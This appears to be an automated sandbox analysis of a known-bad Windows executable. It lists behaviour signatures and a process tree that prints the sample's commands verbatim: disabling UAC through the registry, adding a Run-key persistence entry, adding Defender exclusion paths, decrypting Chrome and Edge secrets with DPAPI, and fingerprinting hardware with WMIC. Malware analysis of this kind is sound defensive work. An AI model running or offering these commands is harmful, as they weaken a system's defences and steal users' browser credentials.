Analysis Overview
SHA256
b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2
Threat Level: Known bad
The file b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Reads user/profile data of web browsers
Checks computer location settings
Loads dropped DLL
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
Blocklisted process makes network request
Checks installed software on the system
Adds Run key to start application
An obfuscated cmd.exe command-line is typically used to evade detection.
Drops file in System32 directory
Enumerates processes with tasklist
Drops file in Windows directory
System Location Discovery: System Language Discovery
Unsigned PE
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Modifies registry class
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-11-04 02:47
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-04 02:47
Reported
2024-11-04 02:50
Platform
win10v2004-20241007-en
Max time kernel
135s
Max time network
143s
Command Line
Signatures
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\python-installer.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe | N/A |
| N/A | N/A | C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2 = "C:\\ProgramData\\Update.vbs" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4} = "\"C:\\Users\\Admin\\AppData\\Local\\Package Cache\\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\\python-3.12.6-amd64.exe\" /burn.runonce" | C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\E: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\A: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\system32\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\NauSjxiGnW.txt | C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe | N/A |
| File opened for modification | C:\Windows\System32\NauSjxiGnW.txt | C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIE157.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e57de3f.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e57de3a.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{901B913C-FA63-48D2-9842-7D7676739378} | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e57de3e.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e57de3f.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{537B2AF5-504B-4303-99CB-FDE56F47AA51} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIE466.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e57de3a.msi | C:\Windows\system32\msiexec.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\python-installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\CPython-3.12\Version = "3.12.6150.0" | C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\ = "{901B913C-FA63-48D2-9842-7D7676739378}" | C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Version = "3.12.6150.0" | C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies | C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4} | C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\DisplayName = "Python 3.12.6 Executables (64-bit)" | C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\ = "{537B2AF5-504B-4303-99CB-FDE56F47AA51}" | C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51}\Version = "3.12.6150.0" | C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\CPython-3.12 | C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\CPython-3.12\ = "{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}" | C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\CPython-3.12\Dependents\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4} | C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\DisplayName = "Python 3.12.6 Core Interpreter (64-bit)" | C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378}\Dependents | C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer | C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\CPython-3.12\DisplayName = "Python 3.12.6 (64-bit)" | C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\CPython-3.12\Dependents | C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{901B913C-FA63-48D2-9842-7D7676739378} | C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Installer\Dependencies\{537B2AF5-504B-4303-99CB-FDE56F47AA51} | C:\Windows\Temp\{B18040BF-3AAF-438A-9668-19ACBE5857C9}\.cr\python-installer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe
"C:\Users\Admin\AppData\Local\Temp\b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\ChedmB0hfd.ps1""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\ChedmB0hfd.ps1"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\obnw3idv\obnw3idv.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA875.tmp" "c:\Users\Admin\AppData\Local\Temp\obnw3idv\CSC7D50F6DD4FEB43E28B3E933ADDF3E253.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,100,92,105,220,243,63,48,77,130,150,78,48,139,61,164,173,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,81,43,120,173,241,247,62,115,26,136,95,252,103,11,132,114,190,190,236,97,57,213,81,7,219,254,212,140,153,114,132,65,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,191,202,27,33,60,112,20,124,4,172,111,137,104,247,111,169,44,144,39,215,28,99,226,21,45,145,91,23,42,132,214,9,48,0,0,0,222,121,14,212,158,118,82,21,27,54,118,232,74,33,110,201,191,134,42,137,219,248,209,115,30,61,144,45,227,245,250,166,44,11,103,211,78,55,52,202,11,104,70,47,212,30,205,30,64,0,0,0,92,46,67,123,247,132,92,200,31,226,34,205,177,30,50,57,212,80,164,244,47,191,207,122,237,107,18,66,181,203,180,63,77,74,125,114,98,125,253,154,41,130,139,221,42,37,230,246,163,60,184,30,12,50,172,221,96,61,156,45,247,149,3,64), $null, 'CurrentUser')"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,100,92,105,220,243,63,48,77,130,150,78,48,139,61,164,173,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,81,43,120,173,241,247,62,115,26,136,95,252,103,11,132,114,190,190,236,97,57,213,81,7,219,254,212,140,153,114,132,65,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,191,202,27,33,60,112,20,124,4,172,111,137,104,247,111,169,44,144,39,215,28,99,226,21,45,145,91,23,42,132,214,9,48,0,0,0,222,121,14,212,158,118,82,21,27,54,118,232,74,33,110,201,191,134,42,137,219,248,209,115,30,61,144,45,227,245,250,166,44,11,103,211,78,55,52,202,11,104,70,47,212,30,205,30,64,0,0,0,92,46,67,123,247,132,92,200,31,226,34,205,177,30,50,57,212,80,164,244,47,191,207,122,237,107,18,66,181,203,180,63,77,74,125,114,98,125,253,154,41,130,139,221,42,37,230,246,163,60,184,30,12,50,172,221,96,61,156,45,247,149,3,64), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,100,92,105,220,243,63,48,77,130,150,78,48,139,61,164,173,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,81,56,253,93,39,18,236,19,234,240,34,4,142,243,213,223,117,77,6,121,224,83,100,46,45,50,133,104,79,190,29,127,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,204,39,144,19,170,227,77,14,216,13,225,106,33,15,140,131,35,169,79,164,221,66,93,182,232,16,150,190,81,134,4,6,48,0,0,0,121,226,12,223,234,112,153,115,34,106,114,48,0,198,48,143,164,45,11,153,192,242,19,76,56,189,187,71,3,33,216,123,30,204,207,147,94,245,224,222,166,92,75,156,123,48,34,48,64,0,0,0,18,246,192,99,212,252,220,210,53,28,177,171,228,191,142,171,93,232,9,132,169,155,144,195,114,116,194,80,143,119,95,253,159,220,45,62,173,148,47,75,164,107,231,166,65,4,34,221,229,128,213,39,206,107,58,6,252,115,163,220,28,249,95,152), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,100,92,105,220,243,63,48,77,130,150,78,48,139,61,164,173,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,81,56,253,93,39,18,236,19,234,240,34,4,142,243,213,223,117,77,6,121,224,83,100,46,45,50,133,104,79,190,29,127,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,204,39,144,19,170,227,77,14,216,13,225,106,33,15,140,131,35,169,79,164,221,66,93,182,232,16,150,190,81,134,4,6,48,0,0,0,121,226,12,223,234,112,153,115,34,106,114,48,0,198,48,143,164,45,11,153,192,242,19,76,56,189,187,71,3,33,216,123,30,204,207,147,94,245,224,222,166,92,75,156,123,48,34,48,64,0,0,0,18,246,192,99,212,252,220,210,53,28,177,171,228,191,142,171,93,232,9,132,169,155,144,195,114,116,194,80,143,119,95,253,159,220,45,62,173,148,47,75,164,107,231,166,65,4,34,221,229,128,213,39,206,107,58,6,252,115,163,220,28,249,95,152), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f"
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2 /t REG_SZ /d "C:\ProgramData\Update.vbs" /f"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.zLX4xIQdwn""
C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get serialnumber
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\.zLX4xIQdwn"
C:\Windows\system32\reg.exe
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v b4c84c53e83488f95024a23205daaf21fcfb7b311f752f6497fbd8c6655611e2 /t REG_SZ /d "C:\ProgramData\Update.vbs" /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath "C:\Windows\System32\Tasks"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
C:\Windows\System32\Wbem\WMIC.exe
wmic baseboard get serialnumber
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_computersystemproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Description,PNPDeviceID
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
C:\Windows\System32\Wbem\WMIC.exe
wmic memorychip get serialnumber
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
